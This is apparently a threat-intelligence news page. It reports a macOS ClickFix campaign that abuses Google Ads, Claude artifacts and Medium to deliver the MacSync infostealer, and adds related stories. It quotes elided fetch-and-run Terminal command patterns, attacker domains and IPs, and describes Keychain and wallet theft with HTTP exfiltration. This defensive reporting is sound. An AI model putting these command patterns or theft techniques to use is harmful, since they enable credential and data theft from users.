ClickFix Campaign Abuses Claude Artifacts and Google Ads to Deliver macOS Infostealers
Threat actors are running a ClickFix-style social-engineering campaign that abuses Google sponsored search results to funnel macOS users to malicious content hosted on legitimate platforms, including Anthropic Claude public artifacts (claude.ai) and Medium pages impersonating trusted sources (e.g., Apple Support). The lures target common search queries such as “online DNS resolver,” “macOS CLI disk space analyzer,” and “HomeBrew,” then instruct victims to paste and run Terminal commands that decode/execute payloads (e.g., echo "..." | base64 -D | zsh or curl ... | zsh). Researchers (Moonlock Lab/MacPaw and AdGuard) reported that the malicious Claude artifact accumulated ~12,300 to 15,600 views, indicating significant exposure (reported as 10,000+ and 15,000+ potential victims across coverage).
The payloads deliver macOS information-stealing malware, including MacSync, which collects data such as Keychain credentials, browser data, and cryptocurrency wallet files. Reported tradecraft includes downloading and executing a shell script, using an AppleScript component for theft, staging stolen data into /tmp/osalogging.zip, and exfiltrating via HTTP POST to attacker infrastructure (e.g., a2abotnet[.]com/gate, with C2 paths like a2abotnet[.]com/dynamic). The malware attempts to blend in by spoofing legitimate macOS browser User-Agent strings and includes retry logic for large/chunked uploads, then removes staging artifacts to reduce forensic traces.
Get ahead of threats like this
Mallory correlates global threat intelligence with your attack surface — know if you’re exposed before adversaries strike.
How this story unfolded
8 events from the most recent confirmed update back to the earliest known activity.
GitHub Gist publishes IOCs for GitHub-themed macOS ClickFix campaign
On 2026-05-16, a GitHub Gist published indicators of compromise tied to a macOS-focused ClickFix infostealer campaign themed around GitHub. The IOC set included numerous suspicious domains and an IP address, revealing infrastructure likely used to stage, relay, or deliver malware through Mac-focused social-engineering lures.
Google ad for Homebrew leads to fake Claude ClickFix infection
On 2026-05-11, a malicious Google advertisement shown for Homebrew searches redirected users to a fake Claude download page that used ClickFix-style instructions to make victims paste a command into Terminal. During execution, the malware requested the user's password and macOS permissions including Finder and folder access, and researchers captured related network traffic for analysis.
Google Ads route users to malicious Claude shared chats on claude.ai
By 2026-05-10, researchers reported an active malvertising campaign in which Google Ads for Claude downloads led users to legitimate Claude.ai shared chats containing social-engineering instructions to paste malicious Terminal commands. BleepingComputer also identified a second malicious Claude shared chat using separate infrastructure, while one observed variant deployed MacSync and included victim profiling and CIS-region keyboard checks.
Fake Claude download ad delivers new macOS ClickFix payload
On 2026-04-22, researchers documented a malicious Google ad that redirected users to a fake Claude download page at cladesktop.gitlab.io, where a ClickFix-style flow delivered a password-protected ZIP containing a Mach-O arm64 malware sample saved as /tmp/helper. The infection chain used newly registered infrastructure including arkypc.com for payload delivery and communicated with a command-and-control server at 45.94.47.204:80.
Researchers report campaign reach exceeded 15,000 views
Investigators observed that at least one malicious Claude guide had accumulated significant exposure, with reported view counts ranging from more than 10,000 to over 15,000. This indicated the campaign had reached a large pool of potential macOS victims through promoted search results and trusted hosting platforms.
Researchers link multiple campaign variants to the same actor
Analysis by Moonlock Lab and AdGuard found the Claude Artifact and Medium impersonation variants likely came from the same threat actor because both retrieved second-stage payloads from the same command-and-control infrastructure. Researchers also noted the campaign fit a broader pattern of threat actors abusing public AI-sharing features previously seen with ChatGPT and Grok.
MacSync infostealer delivered through Claude and Medium lures
Victims who executed the copied shell commands downloaded a loader that installed the MacSync infostealer. The malware used AppleScript and other built-in macOS tools to steal Keychain data, browser information, and cryptocurrency wallet data, package it into /tmp/osalogging.zip, and exfiltrate it to attacker infrastructure including a2abotnet[.]com/gate.
Threat actors launch ClickFix campaign targeting macOS users
A financially motivated campaign began using Google Ads and SEO-poisoned search results to lure macOS users to fake support or how-to pages. The pages abused trusted platforms including Anthropic Claude Artifacts and Medium to socially engineer victims into pasting malicious Terminal commands.
Related entities
Vulnerabilities, threat actors, malware, products, organizations, and breaches Mallory has linked to this story.
Sources
11 references tracked. Mallory keeps watching after this page renders.
MacOS_Github_Themed_Clickfix_16052026 · GitHub
gist.github.com
Open sourcemacOS Malware Leverages Google Ads and Legitimate Claude.ai Shared Chats to Deliver Malware
cybersecuritynews.com
Open sourceMalware-Traffic-Analysis.net - 2026-05-11: Google ad for Homebrew leads to macOS malware infection
malware-traffic-analysis.net
Open sourceHackers Abuse Google Ads and Claude.ai Shared Chats to Distribute macOS Malware - gHacks Tech News
ghacks.net
Open sourceGoogle Ads and Claude AI Abused to Spread MacSync Malware via ClickFix
hackread.com
Open sourceClaude LLM Artifacts Exploited to Distribute Mac Infostealer Malware via ClickFix Attack Chain Targeting macOS Users
rescana.com
Open sourceThreat Actors Exploit Claude Artifacts and Google Ads to Target macOS Users
cybersecuritynews.com
Open sourceClaude LLM artifacts abused to push Mac infostealers in ClickFix attack
bleepingcomputer.com
Open sourceSee the full picture, correlated to your attack surface.
Map indicators from this story to your assets and identify affected systems in minutes.
Every observed campaign, victim, and pivot linked to actors named in this story.
Malware, exploits, and IOCs connected to the activity described here.
YARA, Sigma, and Snort rules deployed to your SIEM as soon as they’re published.
Get matching new stories delivered to your team as they break — not the next morning.
Ask questions about this story and take action on the answers.
Related stories
Other stories Mallory is tracking that overlap on entities, sources, or topic labels.
ClickFix Campaigns Deliver MacSync Infostealer to macOS Users
Researchers reported **three ClickFix campaigns** that used social engineering rather than software exploitation to infect **macOS** users with the **MacSync** infostealer. The activity evolved over several months, beginning with fake sponsored search results for an **OpenAI Atlas** browser download hosted on fraudulent pages, then shifting to malicious workflows that abused shared **ChatGPT** conversations and GitHub-themed landing pages to make the infection chain appear legitimate. In each case, victims were instructed to open **Terminal** and paste commands, allowing the malware to be installed through user action instead of a traditional exploit. The most recent campaign introduced a more advanced **MacSync** variant with **multi-stage loaders**, **dynamic AppleScript payloads**, and **in-memory execution** intended to improve evasion and persistence. Reporting indicates the later activity targeted users in **Belgium, India, and parts of North and South America**, while researchers said it remains unclear whether all three campaigns were conducted by the same threat actor. The findings underscore a broader trend of attackers adapting **ClickFix** lures for macOS, using trusted platforms, sponsored links, and fake AI-tool installers to steal credentials and other sensitive data while bypassing file-based defenses by persuading users to execute the attack themselves.
May 8, 2026
ClickFix Social Engineering Drives Multi-Platform Malware Delivery
Security researchers reported multiple active campaigns using **ClickFix** social engineering—fake error dialogs or verification prompts that trick users into manually running attacker-supplied commands—to bypass browser and download protections and establish an initial foothold. In one enterprise case investigated by **CERT Polska (cert.pl)**, victims were lured via compromised websites showing a fake CAPTCHA/“fix” prompt that instructed them to paste and run a **PowerShell** command via `Win+R`; the script then downloaded a dropper and enabled rapid follow-on activity that can scale to **enterprise-wide compromise**, including deployment of secondary malware such as **Latrodectus** and **Supper** for data theft, lateral movement, and potential ransomware staging. A separate ClickFix operation targeted **macOS developers** by cloning the *Homebrew* site on typosquatted infrastructure; the “install” command was subtly altered to fetch content from `raw.homabrews.org` instead of `raw.githubusercontent.com`, leading to **Cuckoo Stealer** deployment and credential harvesting via repeated password prompts using macOS Directory Services, with related domains tied to shared hosting at **`5.255.123.244`**. ClickFix was also observed as the initial execution mechanism for the resurfaced **Matanbuchus 3.0** MaaS loader, which uses deceptive copy/paste prompts and **silent MSI** execution (via `msiexec`) to deliver a new payload, **AstarionRAT**, enabling capabilities including credential theft and **SOCKS5** proxying; operators were reported to move laterally quickly (including toward domain controllers), consistent with ransomware or data-exfiltration objectives.
Mar 21, 2026
ClickFix macOS Campaign Abuses Script Editor to Deploy Atomic Stealer
Researchers identified a **ClickFix-style** campaign targeting macOS users that swaps Terminal-based execution for **Script Editor** to bypass newer Apple protections. Victims are lured to fake Apple-themed pages such as “Reclaim disk space on your Mac,” which invoke the `applescript://` URL scheme and open Script Editor with a pre-filled AppleScript. If the user runs it, the script conceals a malicious shell command that decodes a URL, uses `curl` with TLS certificate validation disabled, and pipes the response directly into `zsh` for in-memory execution. The activity, discovered by **Jamf Threat Labs**, ultimately downloads and launches a Mach-O variant of **Atomic Stealer**, an infostealer built to harvest browser credentials, saved passwords, cryptocurrency wallets, and other sensitive data from macOS systems. Researchers said the campaign appears to be an adaptation to Apple’s paste-command scanning protections added in macOS 26.4 for Terminal abuse; while newer macOS versions also warn about unidentified scripts, the attack can still succeed if users follow the prompts. Reported infrastructure tied to the campaign includes `dryvecar.com`, `storage-fixes.squarespace.com`, and `cleanupmac.mssg.me`.
May 25, 2026